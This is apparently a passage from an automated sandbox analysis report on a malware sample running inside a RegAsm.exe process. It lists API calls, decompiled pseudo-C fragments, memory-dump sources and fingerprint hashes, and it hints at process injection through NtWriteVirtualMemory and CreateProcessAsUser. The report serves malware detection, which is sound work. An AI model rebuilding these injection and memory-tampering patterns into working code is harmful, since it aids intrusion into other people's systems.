GetLastError.KERNEL32(03F01EF2,00000000,00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C5AE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C5BE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 193a948fd21d967a15f3b5a627274f1005c38493c29c67bcdeb48aff248c2448
Instruction ID: 5c4df2e3944decbda6ac62c3ef10863e72ade0beb6cbaa0bd9b35c1216483e3c
Opcode Fuzzy Hash: 193a948fd21d967a15f3b5a627274f1005c38493c29c67bcdeb48aff248c2448
Instruction Fuzzy Hash: A0F0A472346211EFE320EA78AC59E2A7A6CEB55371B140139FA16C22D4C7A44C11D674

Uniqueness

Uniqueness Score: -1.00%

Function 004017A0, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004017A0() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x40416c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x404168 = _t5;
					 *0x404170 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x404164 = _t6;
					if(_t6 == 0) {
						 *0x404164 =  *0x404164 | 0xffffffff;
					}
					return 0;
				}
			}

0x004017a1
0x004017af
0x004017b7
0x004017bc
0x00401806
0x00401806
0x004017be
0x004017c6
0x00401802
0x00401804
0x004017c8
0x004017c8
0x004017cd
0x004017db
0x004017e0
0x004017e6
0x004017ee
0x004017f3
0x004017f5
0x004017f5
0x004017ff
0x004017ff

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401420,?,00000000), ref: 004017AF
GetVersion.KERNEL32(?,00000000), ref: 004017BE
GetCurrentProcessId.KERNEL32(?,00000000), ref: 004017CD
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 004017E6

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 1f37d8cef35f57a9594b0713588089a9a41e682ffd79eb6d7284a07f391e5ce2
Instruction ID: 52a46ca146cfa4171691c544fe91a6edee6143e40f8949cd62b7477f8fdbcb05
Opcode Fuzzy Hash: 1f37d8cef35f57a9594b0713588089a9a41e682ffd79eb6d7284a07f391e5ce2
Instruction Fuzzy Hash: F6F01DB1A413109AE7919F79BE0DB463FA8B798712F00413AE315FA1F4D3708981CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 03F17EEF, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 03F17F03
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 03F17F43

Part of subcall function 03F12931: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00000FFF,03F04926,00000000,?,03F04926,00000FFF,00000000,00000000,00000318,00000020,?,00010003,00000FFF), ref: 03F1294F

RtlNtStatusToDosError.NTDLL(00000000), ref: 03F17F4C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
String ID:
API String ID: 4036914670-0
Opcode ID: d6776247e51b0c42c0c96544979012dc636ace20b28be6dcd1fbd6e14880d4d4
Instruction ID: ca86d84403bdeca70c39c0d177e908784295a578cf1c2dd392f17a941f0a9921
Opcode Fuzzy Hash: d6776247e51b0c42c0c96544979012dc636ace20b28be6dcd1fbd6e14880d4d4
Instruction Fuzzy Hash: B001E875A00108FBEF11EAA5EC44DEFBBBDEB84700F540065FA15E6150E775D9249B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0155B, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 03F0158C
RtlNtStatusToDosError.NTDLL(C000009A), ref: 03F015C3

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: 824e730679f148cace5a412605f86826622fb0cf6d349d6680e92a8248e91dda
Instruction ID: 99094e1f4d0f4f00995b1f2852c4f34b6e8d0a2677b309449daf9635bf85bc68
Opcode Fuzzy Hash: 824e730679f148cace5a412605f86826622fb0cf6d349d6680e92a8248e91dda
Instruction Fuzzy Hash: 9E01677BD02525EBDB31DB998904ABEFA699F85B54F054114ED03AB380D7758E00A6D0

Uniqueness

Uniqueness Score: -1.00%

Function 03F01641, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F01660
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 03F01678

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: df21d7b5a2f4cba27ff878126b0f97f3266f0e450a6dba3aad7af3fd6b774a3f
Instruction ID: 1ec233955ba7b5d623f0d3373a6d06c638e5933aea70351a6d1e96613f848dab
Opcode Fuzzy Hash: df21d7b5a2f4cba27ff878126b0f97f3266f0e450a6dba3aad7af3fd6b774a3f
Instruction Fuzzy Hash: 91F0627690021CBADB20DB94DC05FDEBB7C9B04740F4440A0BA08E6180E775DB64CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F10B30, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 03F10B5D
SetLastError.KERNEL32(00000000,?,03F0169D,?,?,00000000,000001E8,?), ref: 03F10B64

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: cf94c62764a24b4ea7df8eb4d8de6c5805b696f8460db67345278d718181c432
Instruction ID: 5cea884e51b0697308d22e107190b007f7efa3a453aaf6823408497463d88158
Opcode Fuzzy Hash: cf94c62764a24b4ea7df8eb4d8de6c5805b696f8460db67345278d718181c432
Instruction Fuzzy Hash: A6E09A3660021EEBCF11AEE5AC15D9B7B69AB18759B008050BE41D6225CB75D8B19FA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A8185, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A8185(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10aa330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10aa378 = 1;
										__eflags =  *0x10aa378;
										if( *0x10aa378 != 0) {
											goto L60;
										}
										_t84 =  *0x10aa330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10aa378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10aa330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10aa338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x10aa334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10aa338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10aa338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10aa378 = 1;
							__eflags =  *0x10aa378;
							if( *0x10aa378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10aa338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10aa338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10aa378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10aa338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10aa330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10aa338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10aa338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x010a818f
0x010a8192
0x010a8198
0x010a81b6
0x00000000
0x010a81b6
0x010a81a0
0x010a81a9
0x010a81af
0x010a81be
0x010a81c1
0x010a81c4
0x010a81ce
0x010a81ce
0x010a81d0
0x010a81d3
0x010a81d5
0x010a81d5
0x010a81d7
0x010a81da
0x00000000
0x00000000
0x010a81dc
0x010a81de
0x010a8244
0x010a8244
0x010a83a2
0x00000000
0x010a83a2
0x010a81e0
0x010a81e0
0x010a81e4
0x010a81e6
0x010a81e6
0x010a81e6
0x010a81e6
0x010a81e9
0x010a81ea
0x010a81ed
0x010a81ed
0x010a81f1
0x010a81f5
0x010a8203
0x010a8203
0x010a820b
0x010a8211
0x010a8213
0x010a8215
0x010a8225
0x010a8232
0x010a8236
0x010a823b
0x010a823d
0x010a82bb
0x010a82bb
0x010a823f
0x010a823f
0x010a823f
0x010a82bd
0x010a82bf
0x010a83a0
0x010a83a0
0x00000000
0x010a82c5
0x010a82c5
0x010a82cc
0x00000000
0x00000000
0x010a82d2
0x010a82d6
0x010a8332
0x010a8334
0x010a833c
0x010a833e
0x010a8340
0x00000000
0x00000000
0x010a8342
0x010a8348
0x010a834a
0x010a834c
0x010a8361
0x010a8361
0x010a8363
0x010a8392
0x010a8399
0x00000000
0x010a8399
0x010a8367
0x010a8368
0x010a836a
0x010a836c
0x010a836c
0x010a836e
0x010a8370
0x010a8372
0x010a8386
0x010a8386
0x010a8389
0x010a838b
0x010a838b
0x010a838c
0x010a838c
0x00000000
0x010a8374
0x010a8374
0x010a8374
0x010a837d
0x010a837e
0x010a8380
0x010a8382
0x010a8382
0x00000000
0x010a8374
0x010a8372
0x010a834e
0x010a8355
0x010a8355
0x010a8357
0x00000000
0x00000000
0x010a8359
0x010a835a
0x010a835d
0x010a835f
0x00000000
0x00000000
0x00000000
0x010a835f
0x00000000
0x010a8355
0x010a82d8
0x010a82db
0x010a82e0
0x00000000
0x00000000
0x010a82e9
0x010a82eb
0x010a82f1
0x00000000
0x00000000
0x010a82f7
0x010a82fd
0x00000000
0x00000000
0x010a8303
0x010a8305
0x010a830e
0x010a8312
0x00000000
0x00000000
0x010a8318
0x010a831b
0x010a831d
0x00000000
0x00000000
0x010a8324
0x010a8326
0x00000000
0x00000000
0x010a8328
0x010a832c
0x00000000
0x00000000
0x00000000
0x010a832c
0x00000000
0x00000000
0x00000000
0x010a8217
0x010a8217
0x010a8217
0x010a821e
0x00000000
0x00000000
0x010a8220
0x010a8221
0x010a8223
0x00000000
0x00000000
0x00000000
0x010a8223
0x010a824b
0x010a824d
0x00000000
0x00000000
0x010a825d
0x010a825f
0x010a8261
0x00000000
0x00000000
0x010a8267
0x010a826e
0x010a829a
0x010a829a
0x010a829c
0x010a829e
0x010a82b2
0x010a82b4
0x00000000
0x00000000
0x00000000
0x00000000
0x010a82a0
0x010a82a0
0x010a82a0
0x010a82a9
0x010a82aa
0x010a82ac
0x010a82ae
0x010a82ae
0x00000000
0x010a82a0
0x010a8270
0x010a8270
0x010a8273
0x010a8275
0x010a8287
0x010a8287
0x010a828a
0x010a828c
0x010a828c
0x010a828d
0x010a828d
0x010a8293
0x010a8293
0x00000000
0x00000000
0x00000000
0x00000000
0x010a8277
0x010a8277
0x010a8277
0x010a827e
0x00000000
0x00000000
0x010a8280
0x010a8280
0x010a8281
0x00000000
0x00000000
0x00000000
0x010a8281
0x010a8283
0x010a8285
0x010a8298
0x00000000
0x00000000
0x00000000
0x010a8298
0x00000000
0x010a8285
0x010a81f7
0x010a81fa
0x010a81fd
0x00000000
0x00000000
0x010a81ff
0x010a8201
0x00000000
0x00000000
0x00000000
0x010a8201
0x010a81c6
0x010a81c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 010A8236

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 6088cb132dad52a1d22ff09af81c99d3252cb51ed9b6a9c16362bc9dc60a6af0
Instruction ID: 77f5c6affc88e55c3e8c10b0ce5c802fcf219f2dca1e9fff7a90b8a16e216195
Opcode Fuzzy Hash: 6088cb132dad52a1d22ff09af81c99d3252cb51ed9b6a9c16362bc9dc60a6af0
Instruction Fuzzy Hash: 4661D532700A02DFDB6ACAACC89067977E5FB85352FE4C06AE5D6CB295E372D841C750

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E6B9, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 03F0E6F3

Part of subcall function 03F0195D: ResumeThread.KERNEL32(00000004,?,03F0E707,?), ref: 03F01972

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: 7d90018ca25c7bdce58b6549d9c34c46a874f9752c1efb8006f580500660762d
Instruction ID: 21141ce456834a9ec2069341887c866555ed6f2cb07105113745fd71ada643e0
Opcode Fuzzy Hash: 7d90018ca25c7bdce58b6549d9c34c46a874f9752c1efb8006f580500660762d
Instruction Fuzzy Hash: FCF0F932215209AF9F029F99DC41CDA7FAAFF5D374B054226FE59A2160C732DC21EB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F2389B, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 03F238B3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: f974d363f40a9ade1e8f14b29078656fe566d2297d24bcd72d82932ea6b854ae
Instruction ID: be41a463fa303c4b3c6304914452b3e8f89de5d1122a39294e795ca533a6dfb8
Opcode Fuzzy Hash: f974d363f40a9ade1e8f14b29078656fe566d2297d24bcd72d82932ea6b854ae
Instruction Fuzzy Hash: E1C01236604202EFEE28AB10D92992A7B25AB60340F04441DB949C40A4CB799850C611

Uniqueness

Uniqueness Score: -1.00%

Function 03F10A74, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 03F10B5D
SetLastError.KERNEL32(00000000,?,03F0169D,?,?,00000000,000001E8,?), ref: 03F10B64

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 49d761b81513982dda457252163bf76bd22eaf71448e35a1cbf84a3212f82dc2
Instruction ID: 28ba0af5623f646991d2ff05ab001bd101a18e0a9431df912c4ea6906f2b6948
Opcode Fuzzy Hash: 49d761b81513982dda457252163bf76bd22eaf71448e35a1cbf84a3212f82dc2
Instruction Fuzzy Hash: 1B318F33891416AFDB00DE15DC93AC677B2EF81304B989069D4856BB25FB766156CF80

Uniqueness

Uniqueness Score: -1.00%

Function 03F1FC00, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F082A6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F082DA
Part of subcall function 03F082A6: GetLastError.KERNEL32 ref: 03F0839B
Part of subcall function 03F082A6: ReleaseMutex.KERNEL32(00000000), ref: 03F083A4

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F1FC9E

Part of subcall function 03F06032: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03F0604C
Part of subcall function 03F06032: CreateWaitableTimerA.KERNEL32(03F2C1A8,?,?), ref: 03F06069
Part of subcall function 03F06032: GetLastError.KERNEL32(?,?), ref: 03F0607A
Part of subcall function 03F06032: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 03F060BA
Part of subcall function 03F06032: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 03F060D9
Part of subcall function 03F06032: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 03F060EF

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F1FD01
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F1FD7E
WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 03F1FE23

Part of subcall function 03F0FBB9: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 03F0FBDB
Part of subcall function 03F0FBB9: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 03F0FC09

WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1FE58
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1FE67
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03F1FE94
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03F1FEAE
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 03F1FEF6
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF), ref: 03F1FF10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F1FF26
ReleaseMutex.KERNEL32(?), ref: 03F1FF43
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1FF54
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1FF63
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03F1FF97
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03F1FFB1
SwitchToThread.KERNEL32 ref: 03F1FFB3
ReleaseMutex.KERNEL32(?), ref: 03F1FFBD
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F1FFFB

Part of subcall function 03F152AA: RegOpenKeyA.ADVAPI32(80000001,?), ref: 03F152C8
Part of subcall function 03F152AA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03F152F6
Part of subcall function 03F152AA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F15308
Part of subcall function 03F152AA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03F1532D
Part of subcall function 03F152AA: HeapFree.KERNEL32(00000000,00000000), ref: 03F15348
Part of subcall function 03F152AA: RegCloseKey.ADVAPI32(?), ref: 03F15352

WaitForSingleObject.KERNEL32(?,00000000), ref: 03F20006
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03F20029
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03F20043
SwitchToThread.KERNEL32 ref: 03F20045
ReleaseMutex.KERNEL32(?), ref: 03F2004F
WaitForSingleObject.KERNEL32(?,00000000), ref: 03F20064
CloseHandle.KERNEL32(?), ref: 03F200B2
CloseHandle.KERNEL32(?), ref: 03F200C6
CloseHandle.KERNEL32(?), ref: 03F200D2
CloseHandle.KERNEL32(?), ref: 03F200DE
CloseHandle.KERNEL32(?), ref: 03F200EA
CloseHandle.KERNEL32(?), ref: 03F200F6
CloseHandle.KERNEL32(?), ref: 03F20102
CloseHandle.KERNEL32(?), ref: 03F2010E
RtlExitUserThread.NTDLL(00000000), ref: 03F2011D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: 378adfcf90d9a0fd4223fe71354ee66c1bf68de34d0334fd1260401386875105
Instruction ID: d0de4ce451544c97505984e347417ce02dfcb4cf463019e2dafcd8bdcf5c19be
Opcode Fuzzy Hash: 378adfcf90d9a0fd4223fe71354ee66c1bf68de34d0334fd1260401386875105
Instruction Fuzzy Hash: 57E1827280831AEFD721EF68DC8096EFBE8FB94354F040A29F995D61A4DB71DC119B12

Uniqueness

Uniqueness Score: -1.00%

Function 010A1D10, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E010A1D10(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
